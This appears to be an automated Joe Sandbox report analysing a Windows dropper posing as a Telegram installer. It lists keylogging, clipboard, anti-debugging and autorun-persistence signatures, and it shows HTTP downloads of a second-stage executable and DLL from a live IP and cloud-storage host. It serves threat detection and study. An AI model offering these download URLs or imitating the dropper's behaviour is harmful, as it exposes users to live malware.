Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Telegrm2.69.exe

Overview

General Information

Sample name:Telegrm2.69.exe
Analysis ID:1487486
MD5:30d73384015546e788046f3d30b50b20
SHA1:c70e8b2b6ab3bbf80cf64113d5d71924045833eb
SHA256:29dba2fc79da42f87eaeccf27170e523602d386134e0dab6c61b4f0092040e45
Tags:exe
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
AI detected suspicious sample
Contains functionality to capture and log keystrokes
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to delete services
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
HTTP GET or POST without a user agent
Installs a global mouse hook
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Telegrm2.69.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\Telegrm2.69.exe" MD5: 30D73384015546E788046F3D30B50B20)
  • arphaCrashReport64.exe (PID: 6992 cmdline: "C:\ProgramData\icret\arphaCrashReport64.exe" MD5: 8B5D51DF7BBD67AEB51E9B9DEE6BC84A)
  • arphaCrashReport64.exe (PID: 2756 cmdline: "C:\ProgramData\icret\arphaCrashReport64.exe" MD5: 8B5D51DF7BBD67AEB51E9B9DEE6BC84A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: CurrentVersion Autorun Keys Modification
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\ProgramData\icret\arphaCrashReport64.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Telegrm2.69.exe, ProcessId: 6400, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pirxrm

Snort Signatures

No Snort rule has matched

Suricata Signatures

Timestamp:2024-08-04T12:47:29.384000+0200
SID:2011803
Source Port:9000
Destination Port:49744
Protocol:TCP
Classtype:Executable code was detected
Timestamp:2024-08-04T12:47:03.233957+0200
SID:2011803
Source Port:9000
Destination Port:49733
Protocol:TCP
Classtype:Executable code was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\icret\arphaDump64.dllReversingLabs: Detection: 58%
Source: C:\ProgramData\icret\arphaDump64.dllVirustotal: Detection: 46%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
Source: Telegrm2.69.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\workspace\NEMU\out\win.amd64\release\obj\NemuDTrace\NemuDTrace.pdb source: arphaCrashReport64.exe, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: D:\jenkins\workspace\ci.arphasdk.build\qtc_out\Release_X64\arphaCrashReport64.exe.pdb source: arphaCrashReport64.exe, 00000002.00000002.2904656659.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe, 00000002.00000000.1860273790.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904709601.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe, 00000005.00000000.1941367126.00007FF6E2D72000.00000002.00000001.01000000.00000007.sdmp, arphaCrashReport64.exe.0.dr
Source: Binary string: C:\Users\Admin\Documents\Visual Studio 2008\Projects\D11\x64\Release\D11.pdb source: arphaCrashReport64.exe, 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904813498.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmp, arphaDump64.dll.0.dr
Source: Binary string: D:\workspace\NEMU\out\win.amd64\release\obj\NemuDTrace\NemuDTrace.pdb!` source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: Mfc.pdb source: Telegrm2.69.exe
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030AEF20 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_030AEF20
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_0000024B6458EF20 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,2_2_0000024B6458EF20
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 2_2_00007FF6E2D68F78 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,2_2_00007FF6E2D68F78
Source: C:\ProgramData\icret\arphaCrashReport64.exeCode function: 5_2_00000211DC4CEF20 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00000211DC4CEF20

Networking

barindex
Uses known network protocols on non-standard ports
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 280
Source: unknownNetwork traffic detected: HTTP traffic on port 280 -> 49732
Source: global trafficTCP traffic: 192.168.2.4:49732 -> 154.198.53.117:280
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Sun, 04 Aug 2024 10:47:08 GMTContent-Type: application/octet-streamContent-Length: 238384Connection: keep-alivex-oss-request-id: 66AF5C2C0BFF4B35342476DFAccept-Ranges: bytesETag: "8B5D51DF7BBD67AEB51E9B9DEE6BC84A"Last-Modified: Fri, 19 Jul 2024 07:12:21 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 5816712042177015287x-oss-storage-class: Standardx-oss-ec: 0048-00000113Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: i11R33u9Z661Hpud7mvISg==x-oss-server-time: 2Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e1 d0 a5 69 a5 b1 cb 3a a5 b1 cb 3a a5 b1 cb 3a c0 d7 c8 3b a0 b1 cb 3a c0 d7 ce 3b 29 b1 cb 3a f7 d9 cf 3b b7 b1 cb 3a f7 d9 c8 3b ad b1 cb 3a f7 d9 ce 3b 90 b1 cb 3a c0 d7 cf 3b ae b1 cb 3a c0 d7 ca 3b b7 b1 cb 3a 33 d8 ca 3b a6 b1 cb 3a a5 b1 ca 3a 0b b1 cb 3a 33 d8 ce 3b a2 b1 cb 3a 33 d8 34 3a a4 b1 cb 3a a5 b1 5c 3a a4 b1 cb 3a 33 d8 c9 3b a4 b1 cb 3a 52 69 63 68 a5 b1 cb 3a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 1f 1b f1 60 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 10 00 06 02 00 00 74 01 00 00 00 00 00 24 ea 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 03 00 00 04 00 00 6a 12 04 00 02 00 60 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 04 03 00 dc 00 00 00 00 70 03 00 d8 2d 00 00 00 50 03 00 98 1c 00 00 00 68 03 00 30 3b 00 00 00 a0 03 00 6c 07 00 00 50 b9 02 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 ba 02 00 28 00 00 00 90 b9 02 00 00 01 00 00 00 00 00 00 00 00 00 00 00 20 02 00 40 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c8 05 02 00 00 10 00 00 00 06 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 46 f6 00 00 00 20 02 00 00 f8 00 00 00 0a 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 26 00 00 00 20 03 00 00 12 00 00 00 02 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$i:::;:;):;:;:;:;:;:3;:::3;:34::\::3;:Rich:PEd`"t$@j`
Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: AliyunOSSDate: Sun, 04 Aug 2024 10:47:08 GMTContent-Type: application/octet-streamContent-Length: 2199488Connection: keep-alivex-oss-request-id: 66AF5C2C0BFF4B3534D077DFAccept-Ranges: bytesETag: "5D165E30CDB59FDCCBD2ACE554EF3DF7"Last-Modified: Sun, 21 Jul 2024 04:01:27 GMTx-oss-object-type: Normalx-oss-hash-crc64ecma: 10738669038091672703x-oss-storage-class: Standardx-oss-ec: 0048-00000113Content-Disposition: attachmentx-oss-force-download: trueContent-MD5: XRZeMM21n9zL0qzlVO899w==x-oss-server-time: 3Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c7 68 2d 29 83 09 43 7a 83 09 43 7a 83 09 43 7a 9d 5b c7 7a a6 09 43 7a 9d 5b c0 7a c4 09 43 7a 9d 5b d6 7a 89 09 43 7a a4 cf 38 7a 80 09 43 7a 83 09 42 7a cd 09 43 7a 9d 5b c9 7a 80 09 43 7a 9d 5b d1 7a 82 09 43 7a 9d 5b d2 7a 82 09 43 7a 52 69 63 68 83 09 43 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 23 83 9c 66 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 09 00 00 84 00 00 00 de 20 00 00 00 00 00 34 1b 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 c0 21 00 00 04 00 00 16 7b 21 00 02 00 40 01 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 e0 d1 00 00 83 00 00 00 04 cb 00 00 28 00 00 00 00 20 01 00 dc 8a 20 00 00 10 01 00 bc 07 00 00 00 66 21 00 c0 29 00 00 00 b0 21 00 f0 01 00 00 50 a2 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 82 82 00 00 00 10 00 00 00 84 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 63 32 00 00 00 a0 00 00 00 34 00 00 00 88 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 22 00 00 00 e0 00 00 00 12 00 00 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 bc 07 00 00 00 10 01 00 00 08 00 00 00 ce 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 90 20 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$h-)CzCzCz[zCz[zCz[zCz8zCzBzCz[zCz[zCz[zCzRichCzPEd#f" 4!{!@( f!
Source: global trafficHTTP traffic detected: GET /Test.txt HTTP/1.1Connection: Keep-AliveHost: 154.198.53.117:280
Source: global trafficHTTP traffic detected: GET /arphaCrashReport64.exe HTTP/1.1Connection: Keep-AliveHost: jerryrat2024.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /arphaDump64.dll HTTP/1.1Connection: Keep-AliveHost: jerryrat2024.oss-cn-beijing.aliyuncs.com
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: unknownTCP traffic detected without corresponding DNS query: 154.198.53.117
Source: C:\Users\user\Desktop\Telegrm2.69.exeCode function: 0_2_030A21C0 select,recv,_errno,_errno,_errno,setsockopt,CancelIo,closesocket,SetEvent,0_2_030A21C0
Source: global trafficHTTP traffic detected: GET /Test.txt HTTP/1.1Connection: Keep-AliveHost: 154.198.53.117:280
Source: global trafficHTTP traffic detected: GET /arphaCrashReport64.exe HTTP/1.1Connection: Keep-AliveHost: jerryrat2024.oss-cn-beijing.aliyuncs.com
Source: global trafficHTTP traffic detected: GET /arphaDump64.dll HTTP/1.1Connection: Keep-AliveHost: jerryrat2024.oss-cn-beijing.aliyuncs.com
Source: global trafficDNS traffic detected: DNS query: jerryrat2024.oss-cn-beijing.aliyuncs.com
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: arphaCrashReport64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: arphaDump64.dll.0.drString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
Source: Telegrm2.69.exeString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0V
Source: Telegrm2.69.exeString found in binary or memory: http://crl.globalsign.com/gsgccr45codesignca2020.crl0
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903961019.00000000022F0000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000003.2373019878.000000000076E000.00000004.00000020.00020000.00000000.sdmp, arphaDump64.dll.0.drString found in binary or memory: http://crl.globalsign.com/gsgccr45evcodesignca2020.crl0
Source: Telegrm2.69.exeString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Telegrm2.69.exeString found in binary or memory: http://crl.globalsign.com/root.crl0G
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: arphaCrashReport64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: arphaCrashReport64.exe.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: arphaCrashReport64.exe.0.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://cs-g2-crl.thawte.com/ThawteCSG2.crl0
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/#
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/00)r
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaCrashReport64.exe
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaCrashReport64.exeL
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903905533.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000003.2372963839.000000000077F000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000003.2372868566.000000000077A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll-
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com/arphaDump64.dll64.exeY
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaCrashReport64.exe
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903854396.000000000074B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jerryrat2024.oss-cn-beijing.aliyuncs.com:80/arphaDump64.dll
Source: arphaCrashReport64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0A
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0C
Source: Telegrm2.69.exe, arphaDump64.dll.0.dr, arphaCrashReport64.exe.0.drString found in binary or memory: http://ocsp.digicert.com0X
Source: Telegrm2.69.exe, arphaDump64.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
Source: Telegrm2.69.exeString found in binary or memory: http://ocsp.globalsign.com/gsgccr45codesignca20200V
Source: Telegrm2.69.exe, 00000000.00000003.2372902793.000000000074B000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2903961019.00000000022F0000.00000004.00000020.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000003.2373019878.000000000076E000.00000004.00000020.00020000.00000000.sdmp, arphaDump64.dll.0.drString found in binary or memory: http://ocsp.globalsign.com/gsgccr45evcodesignca20200U
Source: Telegrm2.69.exeString found in binary or memory: http://ocsp.globalsign.com/rootr103
Source: Telegrm2.69.exeString found in binary or memory: http://ocsp.globalsign.com/rootr30;
Source: Telegrm2.69.exe, 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Telegrm2.69.exe, 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904377323.00000211DC4E8000.00000040.00001000.00020000.00000000.sdmp, arphaCrashReport64.exe, 00000005.00000002.2904201868.00000211DC1D0000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
